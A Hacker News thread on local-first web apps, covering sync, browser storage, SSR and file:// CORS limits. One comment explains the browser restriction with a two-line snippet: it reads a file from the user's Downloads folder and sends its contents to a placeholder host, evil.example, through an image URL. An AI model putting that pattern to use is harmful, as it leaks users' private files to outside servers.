I wrote a static web page and accidentally started a community (2023)
226 points | 28 days ago | 24 comments | localfirstweb.dev | HN
dmwilcox
27 days ago
[-]
I love the local-first idea but I don't love web browsers. They're the platform everyone has to have, but shoehorning 40 years of UI development and products into them seems like a mistake.

I can see why local UI development fell out of favor, but it is still better (faster, established tooling, computers already have it so you don't have to download it). I can't help but feel like a lighter weight VM (versus electron) is what we actually want. Or at least what _I_ want, something like UXN but just a little more fully featured.

I'm writing some personal stuff for DOS now with the idea that every platform has an established DOS emulator and the development environment is decent. Don't get me wrong, this is probably totally crazy and a dead end, but it's fun for now. But a universally available emulator of a bare-bones simple machine could solve many computing problems at once, so the idea is tempting. Using DOS as that emulator is maybe crazy, but it's widely available and self-hosting. To make networked applications, though, advancing the state of emulators like DOSBox would be critical.

Actually local-first: maybe the way forward is first to take a step back. What were we trying to accomplish again? What are computers for?

reply
JodieBenitez
27 days ago
[-]
> shoehorning 40 years of UI development and products into them seems like a mistake.

It wouldn't be such a mistake if it were done well. For all the bells and whistles web UIs have, they still lack a lot of what we had on the desktop 30 years ago: good keyboard shortcuts, Tab support in forms, good input masks, and so on.
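
For instance, even a basic Ctrl/Cmd+S has to be wired up by hand (a minimal sketch; saveDocument is a hypothetical app function):

    // Desktop-style save shortcut; without preventDefault the browser's
    // own "save page" dialog appears instead of the app's save.
    document.addEventListener("keydown", (e) => {
      if ((e.ctrlKey || e.metaKey) && e.key === "s") {
        e.preventDefault();
        saveDocument(); // hypothetical app-level save
      }
    });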

reply
raelmiu
27 days ago
[-]
Love this.

What are computers for?

Local-first could be the file format that allows us to use devices without cloud services. Back to file-first: vendors sell software apps, you pay for software once (or for one year of updates, or whatever).

It's a new horizon.

reply
rollcat
27 days ago
[-]
I would still prefer to have my stuff synced between devices. Files are OK for data that doesn't change much (your music/photo/book library) - Syncthing works great there.

CRDTs allow for conflict-free edits where raw files start falling short (calendars, TODOs, etc). I'd love to see something like Syncthing for CRDTs, so that local-first can take the next logical step forward and go cloud-free.
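
A minimal sketch of the kind of merge CRDTs provide: a last-writer-wins register, where two devices that exchange states always converge without coordination (real libraries like Automerge or Yjs go much further than this):

    // Last-writer-wins register: about the simplest possible CRDT.
    function merge(a, b) {
      if (a.ts !== b.ts) return a.ts > b.ts ? a : b;
      return a.device > b.device ? a : b; // deterministic tiebreak
    }

    const phone  = { value: "buy milk",     ts: 1700000002, device: "phone"  };
    const laptop = { value: "buy oat milk", ts: 1700000005, device: "laptop" };
    merge(phone, laptop); // both replicas compute the same winner: "buy oat milk"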

reply
WorldMaker
27 days ago
[-]
The other day I was riffing on ideas on what if Browsers had a third Storage called `roamingStorage`. Keep it the simple, stupid key/value store interface of localStorage and sessionStorage, but allow it to roam between your devices (like classic Windows %RoamingAppData% on a network/domain configured for it). It doesn't even "need" a full sync engine like CRDTs at the browser level, if it did something as simple and dumb as basic MVCC "last write wins, but you can pull previous versions" you can easily build CRDT library support on top of it.
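
To make the riff concrete, the surface could be as small as this (an entirely hypothetical API; nothing like it is standardized):

    // Hypothetical roamingStorage: localStorage's interface plus dumb MVCC.
    roamingStorage.setItem("doc:42", JSON.stringify(state)); // state: whatever your app roams
    const latest  = roamingStorage.getItem("doc:42");        // newest write, from any device
    const history = roamingStorage.versions("doc:42");       // [{ value, ts }, ...] for conflict repair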

The hardest trick to that would be securing it, in particular how you define an application boundary so that the same application has the same roamingStorage but bad actor applications can't spoof your app and exfiltrate data from it. My riffing hasn't found an easy/simple/dumb solution for that (if you want offline apps you maybe can't just rely on website URL as localStorage mostly does today, and that's maybe before you get into confusion about multiple users in the same browser instance using the app), but I assume it's a solvable problem if there was interest in it at the browser level.

reply
satvikpendem
27 days ago
[-]
Local first access control via cryptography: https://www.inkandswitch.com/beehive/notebook/
reply
rollcat
26 days ago
[-]
Look up CloudKit[1]: many of these questions have been answered for Apple-native apps, but perhaps it's not obvious how to translate that to the web world, or how to keep the object storage decentralised (self-hosted shouldn't be a problem, though).

I'm also firmly in the native app camp. And again, Apple did this right. The web interface to iCloud works great from both Firefox and Chromium, even on OpenBSD, even with E2EE enabled (you have to authorise the session from an Apple device you own, but that's actually a great way to protect it and I don't mind the extra step).

It's probably harder to answer those questions if you can't build the solution around a device with a secure element. But there's a lot of food for thought here.

[1]: https://developer.apple.com/documentation/cloudkit/

reply
WorldMaker
26 days ago
[-]
> I'm also firmly in the native app camp.

Then you are answering the wrong question. I want a "web native" answer and proposed a simple modification of existing Web APIs. As a mixed iOS/Windows/Linux user, I have selfish reasons to want a cross-device solution that works at the Firefox standardized level. Even outside of the selfish reason, the kinds of "apps" I've been building that could use simple device-to-device sync have just as many or sometimes more Android users than Apple device users. I've also seen some interesting mixes there too among my users (Android phone, iPadOS device, Windows device; all Chrome browser ecosystem though).

> It's probably harder to answer those questions if you can't build the solution around a device with a secure element.

Raw Passkey support rates are really high. Even devices stuck on Windows 10 because they lack TPM 2.0 still often have reasonably secure TPM 1.2 hardware.

Piggybacking on Passkey roaming standards may be a possibility here, though mixed ecosystem users will need ways to "merge" Passkey-based roaming for the same reasons they need ways to register multiple Passkeys to an app. (I need at least two keys, sometimes three, for my collection of devices today/cross-ecosystem needs, again selfishly at least.)

reply
rollcat
24 days ago
[-]
> Then you are answering the wrong question. I want a "web native" answer and proposed a simple modification of existing Web APIs.

I don't see why this mechanism shouldn't be available both on the web and in native apps. The libraries would just implement the same protocol spec and use equivalent APIs. Just like with WebRTC, RSS, iCal, etc. And again, ideally with P2P capability.

> [...] that works at the Firefox standardized level.

What about a W3C standard? Chrome hijacked the process by implementing whatever-the-hell they like and forcing it upon Firefox & Safari through sheer market share. It would be good to reinforce the idea that vendor-specific "standards" are a no-no.

It also just doesn't work the other way: Firefox tried the same thing with DNT, nobody respected it.

> Piggybacking on Passkey roaming standards may be a possibility here [...]

WebAuthn sounds good, that kinda covers the TPM/SEP requirement. Native apps already normalised using webviews for auth. I wonder if there's a reasonable way to cover headless devices as well, but self-hosted/P2P apps like Syncthing also usually have a web UI.

> [...] again selfishly at least.

No problem with being "selfish". Every solution should start with answering a need.

reply
invalidator
27 days ago
[-]
> I can't help but feel like a lighter weight VM (versus electron) is what we actually want. Or at least what _I_ want, something like UXN but just a little more fully featured.

That's basically the JVM, isn't it?

It's interesting to think how some of the reasons it sucked for desktop apps (performance, native UI) are also true of Electron. Maybe our expectations are just lower now.

reply
dmwilcox
27 days ago
[-]
I got super interested in Clojure and the Java UI frameworks a year ago. But the languages on top of languages scared me. I wanted something simpler, so now I'm writing 16-bit x86 and making bitmapped fonts and things. Probably not a good idea for anyone with a timeline, but it's been educational.
reply
invalidator
27 days ago
[-]
> Probably not a good idea for anyone with a timeline

It's not completely crazy. Software was developed by much smaller teams and got out the door quickly in that era.

reply
rglullis
27 days ago
[-]
From something I wrote in 2021 [0] and based on my experience working on a "browser-based OS" in 2013:

    What we need is to have a device-transparent way to see our *data*. We got so used to the idea that web applications let us work from "dumb terminals" that we failed to realize that *there is no such thing as a dumb terminal anymore*. With multi-core smartphones, many of them with 4, 8, 12, 16GB of RAM; it's not too hard to notice that the actual bottlenecks in mobile devices are battery life and (intermittent and still relatively expensive) network connectivity. These are problems that can be solved by appropriate data synchronization, not by removing the data from the edge. 

    One of the early jokes about web2.0 was that to have a successful company you should take a Unix utility and turn it into a web app. This generation of open source developers are reacting to this by looking at successful companies and building "self-hosted" versions of these web apps. What they didn't seem to realize is that **we don't need them**. The utilities and the applications still work just fine, we just need to manage the data and how to sync between our mobile/edge devices and our main data storage. 

    If you are an open source developer and you are thinking of creating a web app, do us all a favor and ask yourself first: do I need to create yet-another silo or can I solve this with Syncthing?
[0]: https://raphael.lullis.net/thinking-heads-are-not-in-the-clo...
reply
tommica
27 days ago
[-]
Goddammit, of course the closest edge/node to the user is their own damn device... I should have realized that a long time ago
reply
AlienRobot
27 days ago
[-]
That's a very interesting blog post and certainly the way I wish things were headed.
reply
rssoconnor
26 days ago
[-]
> can I solve this with Syncthing?

I recently found out that Syncthing is ending Android support. :(

reply
oneeyedpigeon
27 days ago
[-]
This ties in nicely with the bookmarking discussion about Pinboard. I particularly like the following quote from this article:

> Now, of course, there are many advantages to this shift: collaboration, backups, multi-device access, and so on. But it’s a trade! In exchange, we’ve lost the ability to work offline, user experience and performance, and indeed true dominion over our own data.

I’ve decided that the advantages of storing my bookmarks locally far outweigh the chance that I'll want to access them from a different device or collaborate with someone else on them. Yes, it means I've created something of a 'silo', but I'm starting to think that's not a bad thing.

reply
julianeon
27 days ago
[-]
> I’ve decided that the advantages of storing my bookmarks locally far outweigh the chance that I'll want to access them from a different device or collaborate with someone else on them. Yes, it means I've created something of a 'silo', but I'm starting to think that's not a bad thing.

Why don't you store those bookmarks as markdown files and then upload them to a private repo you can read on other devices and even your phone through the GitHub mobile app? If they're bookmarks, they'll work perfectly as links in markdown which you can click in the GitHub app.

Note: I pay $4/mo for GitHub private repos and I absolutely defy anyone to show me a better deal in any SaaS company. I open the GitHub mobile app at least 10 times a day. This is the only subscription service that is inarguably worth it as far as I'm concerned.

reply
8n4vidtmkvmk
25 days ago
[-]
Aren't GitHub private repos free now?
reply
lgvld
22 days ago
[-]
yes they are ;-)
reply
canadiantim
27 days ago
[-]
May I ask what the bookmarking discussion about Pinboard is? I tried looking through all of the recent articles but found nothing about Pinboard.

What’s your current solution for local bookmarks?

reply
oneeyedpigeon
27 days ago
[-]
This one: https://news.ycombinator.com/item?id=43022098

I'm right in the middle of setting it up. Basically, curl and a bunch of bash scripts.

reply
wim
27 days ago
[-]
Another aspect of local-first I'm exploring is trying to combine it with the ability to make the backend sync server available for local self-hosting as well.

In our case we're building a local-first multiplayer "IDE for tasks and notes" [1] where the syncing or "cloud" component adds features like real-time collaboration, permission controls and so on.

Local-first ensures the principles mentioned in the article, like guaranteed access to your data and no spinners. But that's just the _data_ part. To really add longevity to software, I think it would be cool if it were also possible to guarantee that the _service_ part remains available. In our setup we'll allow users to "eject" at any time by saving a .zip of all their data and simply downloading a single executable (like "server.exe" or "server.bin"). The idea is you can then easily switch to the self-hosted backend running on your computer or a server if you want (or reverse the process and go back to the cloud version).

[1] https://thymer.com/

reply
nsriv
27 days ago
[-]
This looks like a great project and something that could be adapted into what I've been fruitlessly looking for (an OSS/self-hosted, cross-platform version of NotePlan 3 for family use). Not expecting too much movement on your part into the crowded task management space, but the screenshots and examples gave me the same feeling.

Signed up for early access and looking forward to it!

reply
cxr
24 days ago
[-]
> To really add longevity to software, I think it would be cool if it were also possible to guarantee that the _service_ part remains available. In our setup we'll allow users to "eject" at any time by saving a .zip of all their data and simply downloading a single executable (like "server.exe" or "server.bin"). The idea is you can then easily switch to the self-hosted backend running on your computer or a server if you want

Too few people are taking advantage of Redbean <https://redbean.dev/> and what it can do. Look into it.

reply
pillefitz
26 days ago
[-]
If I can host the backend myself, does it imply it's not a commercial offering?
reply
wim
26 days ago
[-]
I think it's not too different from downloadable software, so it doesn't rule out commercial services (we plan on both paid and free versions).
reply
tobilg
26 days ago
[-]
I created https://sql-workbench.com a while ago, mainly to let people analyze data that's available via http sources, or on their local machines, w/o having to install anything.

A recent project is https://shrink.video, which uses the WASM version of ffmpeg to shrink or convert video right in the user's browser, for privacy and the other reasons mentioned before.

reply
yonz
26 days ago
[-]
Nice
reply
runarberg
27 days ago
[-]
I'm working on a kanji learning app (shodoku.app) which some might say fulfills this 'local first' philosophy. Currently it is hosted on GitHub Pages and relies on static assets (such as dictionary files, stroke order SVGs, etc.) which require a web connection to fetch. However, when I make this a PWA (which I'll do very soon) these will all be stored in the browser cache, effectively making it work offline.
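
A minimal sketch of the cache-first service worker I have in mind (the cache name and logic are placeholders):

    // sw.js: serve cached static assets, fall back to the network.
    const CACHE = "shodoku-static-v1";

    self.addEventListener("fetch", (event) => {
      event.respondWith(
        caches.open(CACHE).then(async (cache) => {
          const hit = await cache.match(event.request);
          if (hit) return hit;                   // offline-safe path
          const res = await fetch(event.request);
          cache.put(event.request, res.clone()); // cache for next time
          return res;
        })
      );
    });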

I store the user data (progress, etc.) in IndexedDB in the user's browser and I have to say:

> No spinners: your work at your fingertips

is not true at all. IndexedDB can be frustratingly slow on some devices. It also has frustratingly bad DX (even if you use a wrapper library like idb or Dexie) due to limitations of the database design, which forces you into bad schema designs that further slow things down for the user (as well as increase the total storage consumption on the user's device).
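
To illustrate the DX: even a single read takes the full request/event ceremony (a sketch against the raw API; the database, store, and key names are made up):

    // Raw IndexedDB: one get() means wiring up several callbacks.
    const open = indexedDB.open("reviews", 1);
    open.onupgradeneeded = () => open.result.createObjectStore("progress");
    open.onsuccess = () => {
      const tx  = open.result.transaction("progress", "readonly");
      const req = tx.objectStore("progress").get("kanji:日");
      req.onsuccess = () => console.log(req.result);
      req.onerror  = () => console.error(req.error);
    };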

I also wish browsers offered a standard way to sync data between each other. Even though you can share your Firefox tabs between your phone and computer, you can't get the data from IndexedDB on the same site between your computer and phone. Instead you have to either use a server or download and drop the data between the two clients.

IndexedDB feels like a broken promise of local-first user experience, one which browser vendors (and web standards committees) have given up on.

reply
shayansm1
27 days ago
[-]
I was introduced to local-first while watching this conference talk by Martin Kleppmann (the author of the book Designing Data-Intensive Applications): https://martin.kleppmann.com/2023/06/29/goto-amsterdam.html. It's worth watching!
reply
sirjaz
27 days ago
[-]
This gives me hope that we can get native apps back again, and collaborative work through them without the browser or a central authority
reply
kridsdale1
26 days ago
[-]
Many of us never stopped writing native apps.

When I was at Apple (2010-2015) every app was Local First. In fact they legally had to be to be sold in Germany, where iCloud cannot be mandatory (they have a history of user data being abused).

You'll notice when the network goes down all your calendars, email, contacts, and photos are still there. The source of truth is distributed.

Client-side apps writing to a local DB with background sync (application-specific protocols) work excellently. You just don't write your UI as a web page.

reply
hidelooktropic
27 days ago
[-]
Love this. I had always referred to this concept with the rallying cry: "'offline' is not an error"
reply
physicles
24 days ago
[-]
Reminds me of those “skateboarding is not a crime” stickers
reply
krishadi
27 days ago
[-]
> But I was equally surprised by how little this was being discussed, or (as far as I could tell) practiced in the real world. While there seemed to be endless threads on Twitter about server-side React (to get the UI generation closer to the data), no-one was talking about the opposite: moving the data to be closer to the UI, and onto the client!

This, I've wondered about for a while. There is plenty of talk about server-side rendering, which I don't think is useful for many apps out there. SSR is quite wasteful of client-side resources that could be put to use. And I've seen many apps developed with "use client" littered all over, which makes you wonder why you even want SSR in your app.

reply
zwnow
27 days ago
[-]
Wasn't the reason for SSR to have more control over security and to offload work from the client to the server? Let's not forget that the majority of the world's population is using slow-ass tech. We can't simply put huge workloads on the client.
reply
indymike
27 days ago
[-]
I think the main driver for modern SSR was SEO. The workload part? The whole point of SPAs was to move compute - especially fancy UI compute - down to the client so the server only had to move data... so we're just completing the circle again.
reply
dplgk
26 days ago
[-]
Funny that bad SEO was a big strike against Flash and a reason to move to HTML5
reply
krishadi
27 days ago
[-]
It was mainly for SEO, and to some extent protecting against website scrapers and crawlers.
reply
ZYbCRq22HbJ2y7
27 days ago
[-]
SSR just means you render on the server, it isn't whatever you are describing.
reply
krishadi
27 days ago
[-]
It is exactly what I am talking about. Rendering the component on the server takes up resources, as opposed to just sending the data to the client and letting the client render it.

In Next.js, "use client" is used to force the rendering to take place on the client, because many components cannot be rendered on the server. For example, maps. In this case, it's unnecessary to use an SSR framework.

reply
bzmrgonz
27 days ago
[-]
You should know that the website localfirstweb.dev shows as blacklisted by Avast and AVG antivirus. They don't like a referenced site called strut.io, claiming it is a card stealer.
reply
yonz
26 days ago
[-]
That's just nuts, I'll look into it. I know the guy that built strut and I run the lfw site.
reply
lubujackson
27 days ago
[-]
Very cool. Coincidentally I just made a basic calculator with stored variables (https://calc.li/) with this philosophy in mind, though I didn't know there was a bigger movement around the idea! Mostly, I didn't want to bother with a backend or even cookies, so I just store everything in localStorage (which is criminally under-used IMHO).
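
The whole persistence layer can be this small (a sketch of the approach, not the actual calc.li code):

    // Keep calculator variables in localStorage: no backend, no cookies.
    const KEY = "calc.vars"; // hypothetical storage key

    function loadVars() {
      try { return JSON.parse(localStorage.getItem(KEY) ?? "{}"); }
      catch { return {}; }   // corrupted or absent: start fresh
    }

    function saveVars(vars) {
      localStorage.setItem(KEY, JSON.stringify(vars));
    }
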
reply
staticelf
27 days ago
[-]
Love the idea and the community aspect!

The issue with local-first web dev, in my experience, is twofold:

1. It's super hard. The problem of syncing data is super hard to solve and there is little support from modern tooling, mostly because how you should handle it differs vastly from app to app.

2. Very few people who live in the West, or who pay for software, are offline for long stretches. There are simply very few requests for making apps work offline. I would argue the opposite: it is probably mostly bad business, because you will get stuck on technical details due to #1 being so hard to solve. Even people who say they will use the app offline are never offline, in my experience (from working on a real app that worked offline).

I work on an app that has clear offline benefits, although in practice pretty much no one will use it offline; where I live, people have 5G access nowadays even at places that used to be offline, e.g. trains, tunnels, etc. Even so, I plan to add offline support to my app, but only after I have success with it.

reply
Dwedit
27 days ago
[-]
Hey browser makers, please allow file:// URLs to actually be able to load other files in the same directory without giving a CORS error. You can't even run a JS file from the same directory! That's what's really killing "local first".
reply
IanCal
27 days ago
[-]
As usual, this sounds great for the nice players.

Unfortunately that means if you download an HTML file and double-click on it, then it can send anything in your downloads folder to anywhere else.

reply
jagged-chisel
27 days ago
[-]
Download HTML file (and dependencies), open local file, local JS requests from internet, and CORS error. Why can it not work like this?
reply
IanCal
27 days ago
[-]
> local JS requests from internet

I really don't understand what this means.

reply
jonhohle
27 days ago
[-]
If you load a file using the "file" protocol, it shouldn't be able to load other resources (JS from the internet) over non-file protocols (http, https, etc.) from non-null-string origins, because that would violate cross-origin resource sharing (CORS).

I too like local HTML and would love to see it restored without requiring a local server. If I spin up a local WEBrick to serve anything from my file system, I'm no better off (except maybe that it's scoped to a particular directory and its children).

reply
advisedwang
27 days ago
[-]
People expect to be able to download an HTML file and for it still to be able to load an image from an external URL. If it can do that, it can exfiltrate (e.g. JS can put data loaded from a local file in the src for an image on an external server).
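
A sketch of the exfiltration this prevents (evil.example and the path are placeholders; the fetch is exactly what browsers refuse to allow):

    // If file:// pages could read sibling files, two lines would leak them:
    const secret = await (await fetch("file:///home/user/Downloads/statement.pdf")).text();
    new Image().src = "https://evil.example/steal?d=" + encodeURIComponent(secret.slice(0, 1024));
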
reply
jagged-chisel
27 days ago
[-]
When I save an HTML page, the browser downloads other resources the page wants. This is how it should work for The Average User. Saving just the HTML should be the exception for more technical users.
reply
bandie91
27 days ago
[-]
Or just separate what is a "document" and what is an "application" already, and don't mix them up. I would not even mind if there were a separate "docjs" - JS code for which only the document is visible and which can only do stuff to it - and "appjs", which can do all of the wild JS stuff our great browser vendors come up with. This way, in various cases, you could turn off the potentially harmful appjs while keeping the docjs for validating forms, changing layout, implementing TinyMCE, etc...

IMO the problem is rooted in co-mingling documents and applications on a web page / in an HTML file. Let the user save documents as .html: then they should not be able to do any harm - it's a digital sheet of paper! And web applications as, say, .hta: then the user should not expect any more isolation than for a downloaded .exe or .sh file, and the client program should treat it with due care when downloading, e.g. by putting it in a separate subfolder, setting the SELinux context, etc...

reply
diggan
27 days ago
[-]
Luckily, starting a local HTTP server for development has been more-or-less a one-liner for a long time, in most OSes (maybe even Windows might ship with Python nowadays?):

    python -m http.server 8080
And if you're stuck with Python 2:

    python -m SimpleHTTPServer 8080
At least this doesn't introduce the security issues you'd see with any file:// resource being able to load other file:// resources
reply
8organicbits
27 days ago
[-]
It's not perfect either:

https://docs.python.org/3/library/http.server.html#http-serv...

You should also add a `--bind 127.0.0.1` so you don't expose the site to everyone on your network.
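
Combined:

    python -m http.server 8080 --bind 127.0.0.1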

reply
vindex10
27 days ago
[-]
Only slightly related, but port binding in Docker also binds to 0.0.0.0 by default: `-p 8000:8000`

To be safe, this should be used instead: `-p 127.0.0.1:8000:8000`

reply
janci
27 days ago
[-]
It also bypasses the firewall (ufw on Ubuntu)
reply
rzzzt
27 days ago
[-]
Yes and no, it's modifying the NAT table and so traffic will not be subjected to inbound rules where you would normally add an "allow HTTPS"-style rule: https://docs.docker.com/engine/network/packet-filtering-fire...
reply
diggan
27 days ago
[-]
In what way is that "No"? The docs say:

> Docker routes container traffic in the nat table, which means that packets are diverted before it reaches the INPUT and OUTPUT chains that ufw uses. Packets are routed before the firewall rules can be applied, effectively ignoring your firewall configuration.

So Docker is "effectively" ignoring your firewall in the case of ufw. I don't see how it can be considered not to be ignoring your firewall when it ignores the rules you've set up.

reply
rzzzt
26 days ago
[-]
NAT rules are still firewall (netfilter, iptables - note the plural) territory; ufw is a frontend for iptables to simplify creating rules.

Does Docker violate the principle of least surprise? Yes. Was I bitten by this behavior? Definitely. Does it bypass the firewall? No.

reply
diggan
26 days ago
[-]
I dunno. If I use UFW on Ubuntu, I use it as a firewall, and applications that ignore my firewall, I consider to be ignoring my firewall, regardless of whether the details say it's still using NAT rules so technically it's just ignoring one firewall/something not called a firewall, even though it ignores the firewall you've set up.

To be frank, it kind of feels like the kind of technical nitpick argument I'd read from a Docker Inc employee trying to somehow defend ignoring the user's firewall.

The end result is that you set up rules in UFW, and Docker ignores them.

reply
jonhohle
27 days ago
[-]
That should really be the default behavior.
reply
diggan
27 days ago
[-]
Yeah, that's a good callout, thanks. Not sure why they took the less secure approach for something that is intended as a development environment, but I think I feel like that for lots of decisions in Python so maybe not that weird in the grand scheme of things.
reply
WorldMaker
27 days ago
[-]
> (maybe even Windows might ship with Python nowadays?)

Windows doesn't ship with Python, but it does have a silly thing where if you type python in a command shell of your choice it will try to auto-install python. (When it works it is kind of magic, when it doesn't work it's a pain to debug the PATH problem.)

It's not exactly a one-liner, but in an off-the-shelf Windows install it is a short script to create a simple static file web server inside PowerShell.

Also there are npm and deno packages/CLIs that are easy to install/run for one-liners if you want to install something more "web native" than Python. `npx http-server` is an easy one-liner with any recent Node install.

reply
tlarkworthy
27 days ago
[-]
I have made a notebook environment inside a single HTML file. You have to map dependencies in an importmap to blob URLs, and it works. I have a single-file website online, and you can click download to play with it locally.

https://tomlarkworthy.moldable.app/index.html

You can turn off network and the download works.
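
The core trick, roughly (a sketch: build blob: URLs from inline module source and point an import map at them, before any module loads):

    // Turn an inline source string into an importable module.
    const src = 'export const greet = () => "hello";';
    const url = URL.createObjectURL(new Blob([src], { type: "text/javascript" }));

    const map = document.createElement("script");
    map.type = "importmap";
    map.textContent = JSON.stringify({ imports: { "greet-lib": url } });
    document.head.append(map); // must happen before the first module load

    // Later, from a module script: const { greet } = await import("greet-lib");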

reply
mlajtos
27 days ago
[-]
Without looking into the source – GoldenLayout, right? :)
reply
bsenftner
27 days ago
[-]
Very nice, written up anywhere?
reply
tlarkworthy
27 days ago
[-]
still a WIP but I will write it up properly soon.
reply
genewitch
26 days ago
[-]
Can this be a self-contained alarm and journaling app for cellphones?

Because I can't think of a way to do that without serviceworkers. I mean a way that doesn't involve the end user reading a paragraph of instructions, based on their "OS".

Anyhow, sorry, I just can't tell what it does from the confines of that demo and a cellphone browser...

reply
tlarkworthy
24 days ago
[-]
No, I think you need service workers for notifications. You could do journaling, but it emits a file when saving by default. IndexedDB works, so maybe that's a possibility.
reply
jstanley
27 days ago
[-]
You can totally load a JS file from the same directory, I do it all the time.

I recall you can't use web workers, but just loading a JS file with <script> tags is fine.

reply
Springtime
27 days ago
[-]
You can run non-module scripts, yes, though not modules.

Though it's easy enough to run a local Caddy server. It was easier in the past: in earlier Caddy versions one could just place the caddy binary in PATH and launch `caddy` from any directory to auto-serve a local server; now it requires more arguments or a config file.

reply
jankovicsandras
27 days ago
[-]
I think the following works in Firefox. WARNING: this is a security risk obviously.

about:config -> security.fileuri.strict_origin_policy -> false

source: https://stackoverflow.com/questions/58067499/runing-javascri...

reply
01HNNWZ0MV43FF
27 days ago
[-]
That, and bring back the "new tab" custom URL, and a way to securely host local servers without root but also without just praying that another app doesn't port-squat me.
reply
azornathogron
27 days ago
[-]
Localhost is an entire /8, so you have a few million possible addresses you can bind to if you want, all on whatever your preferred dev server port is.
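
For example, every project can get its own loopback address on the same port (on Linux the whole 127.0.0.0/8 range answers by default; macOS needs an interface alias first):

    python -m http.server 8000 --bind 127.0.0.1
    python -m http.server 8000 --bind 127.0.0.2   # a second app, same port
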
reply
marbu
27 days ago
[-]
Use https://github.com/daisylb/newtab or another extension to load a home page when you open a new tab.
reply
oneeyedpigeon
27 days ago
[-]
I use an extension for the former and the latter has never been a problem for me using ports > 8000.

+1 for having your own local 'tab home page'!

reply
maksimur
27 days ago
[-]
You can bind to port 0 and have the OS then pick an available port for you.
reply
maksimur
27 days ago
[-]
I don't understand the downvote.

OP said

> a way to securely host local servers without root but also without just praying that another app doesn't port-squat me

Binding to port 0 is a solution. I tested it and I always get a port not used by other programs.
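
A sketch of the pattern in Node (most socket APIs have the same trick):

    import { createServer } from "node:http";

    const server = createServer((req, res) => res.end("ok"));
    server.listen(0, "127.0.0.1", () => {
      // The OS picked a free ephemeral port; advertise it however you like.
      console.log(server.address().port);
    });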

reply
oneeyedpigeon
27 days ago
[-]
I guess the main disadvantage is you can't reliably link to anything. Maybe not a problem if you only ever need one local server.
reply
adolph
27 days ago
[-]
Maybe this is an opportunity. Is there already a "DNS for ports", whereby the hosts file is populated with application identifiers that are mapped to localhost:port?
reply
bandie91
27 days ago
[-]
SRV records do this.

hosts file (the hosts NSS database) does not speak DNS.

However, I guess this line of thought comes from web developers wanting a number of *.dev.myproject.net domain names to use in URLs, each handled by a different web listener process. Why not just run nginx as a reverse proxy for all of your *.dev.myproject.net domains? Update your port number ↔ domain name mapping in the nginx config; a reload is quite cheap.
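
e.g. one small server block per dev domain (a sketch; names and ports are placeholders):

    server {
        listen 80;
        server_name app.dev.myproject.net;
        location / {
            proxy_pass http://127.0.0.1:3001;  # this app's listener
        }
    }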

reply
jmbwell
27 days ago
[-]
Careening back to inetd and /etc/services …
reply
adolph
27 days ago
[-]
In some ways it is an inversion of inetd. Instead of something that listens on a bunch of ports and launches the process corresponding to each port, the user has a service that will listen on a random port, and they wish to address it in a human-readable kind of way.

As far as I know, the hosts file does not afford a port number, so a solution would look like a proxy on a known port like 443, listening for a particular domain name that the hosts file routes to localhost, with the proxy routing on to the service on whatever port. You'd also need to set up a local CA to sign a cert for each of the hosts-file domain names...

0. https://www.baeldung.com/linux/mapping-hostnames-ports

reply
genewitch
26 days ago
[-]
Isn't this "service discovery", which Apple had 23 years ago with "Bonjour"? I'm not claiming that stuff like Bonjour (I'm referring to the apparently infringing "Rendezvous") and UPnP did what we're discussing, but you could hack 'em to do it.

I know I generally use Fing in a pinch, or nmap, or I ask the DHCP server for all the hostname<->IP mappings and then nmap -A -T5 (that's threat level five - the system I use)

Is this thing on

reply
dylan604
27 days ago
[-]
It's amazing to me how all of the fancy new ways eventually evolve into the thing they were trying not to be in the first place. We see this time and time again. I've been around long enough to have seen it in several situations, to the point that at the start of the trend someone looks like the old dog refusing to learn a new trick, and then eventually people realize they could have saved a lot of time/effort/money by taking the old dog's advice and experience.
reply
genewitch
26 days ago
[-]
I have said it before and I am unsure if I stole it: you can recreate nearly any "service" the web/internet has to offer today with only the RFCs prior to April, 1995, with the caveat that I'm technically fine with HTTP; I haven't given it much thought.

I think it was LogStash or Summit Patchy Project that let you use IRC as a sink for redirecting logs or making a copy. So I made a PCI-compliant logging service: an immutable ircd (read-only fs) that logged to itself via a local eggdrop. All the little cattle VMs would have their logs sourced and synced via LogStash to an IRC channel for the vertical the VM "belonged to". All the IRC stuff was on an append-only mount on the ircd server, so for an audit, just snapshot that mount and hand it over.

NOC was in the channels. I think some teams set up dashboard widgets that triggered on irc events.

All that was a POC done completely to prove that it could be done using only stuff from pre-1996 RFCs. I'm sure the company I built it for went with some vendor product instead and I don't blame them, I wouldn't have maintained that - you ever set up ircd? The volume of traffic just for logs was already fun to deal with.

Pedants: I'm working from 15 year old memories and I changed a few details to protect the innocent. I can't remember the project name other than it was a play on "BI" for business intelligence.

reply
maksimur
27 days ago
[-]
That's a good point. I assumed a single local server per app.
reply
eadmund
27 days ago
[-]
Support for Unix sockets would be a gamechanger.
reply
rpmisms
27 days ago
[-]
If it's too big to include in a script tag, you don't need it. At least, that's my rule.
reply
begueradj
27 days ago
[-]
From a security perspective, that's a bad thing to do.
reply
quink
27 days ago
[-]
> "local first"

Listening on 127.0.0.1:80 is local first and not being routable is in fact local-only. Its common alias ‘localhost’ even has ‘local’ in the name.

reply
IanCal
27 days ago
[-]
That requires having an actual server though.
reply
_kidlike
27 days ago
[-]
which is extremely easy to do. Most programming languages have a one-liner to do it.
reply
oneeyedpigeon
27 days ago
[-]
The best solution would allow both. Nothing is quite as portable as shoving a .html file on a USB stick.
reply
jagged-chisel
27 days ago
[-]
But then I want my non-technical users to experience the same benefits. So I guess I’m building an app with a web server included.
reply
AlienRobot
27 days ago
[-]
I don't know why we don't have something like Java but for JavaScript. Then we wouldn't need Electron anymore.
reply
cxr
24 days ago
[-]
Huh?
reply
evrimoztamur
27 days ago
[-]
I'm mostly resorting to self-hosting tools on my tiny server these days, but I would love it if I could run local web apps on a synced folder (a la Dropbox), and access them on my computer and mobile phone alike. With the CORS bypasses, it would be so convenient to have your own personal kanban or finance apps running and synced across multiple platforms, and remove the barrier of entry for many.
reply
zozbot234
27 days ago
[-]
Why not use data: or blob: URIs instead? That ought to allow you to load resources from the "same" file, obviating security concerns about loading external resources.

(Alternately you could bundle multiple files into a single ePub, though that requires a few adjustments compared to simple HTML. It's a widely supported format and allows for scripting.)

reply
jFriedensreich
27 days ago
[-]
Because of various security issues, what you really want is something like this web standard going forward: https://developer.chrome.com/docs/web-platform/web-bundles

and combine that with the js file APIs for working with data files.

reply
giancarlostoro
27 days ago
[-]
I think at one point Firefox used to let you open a directory and start a web server in said directory for this very reason.
reply
carlosjobim
27 days ago
[-]
It's a prominent checkbox in the Safari developer settings to enable this.
reply
paulddraper
27 days ago
[-]
You can run a JS file from any directory.
reply
brianzelip
27 days ago
[-]
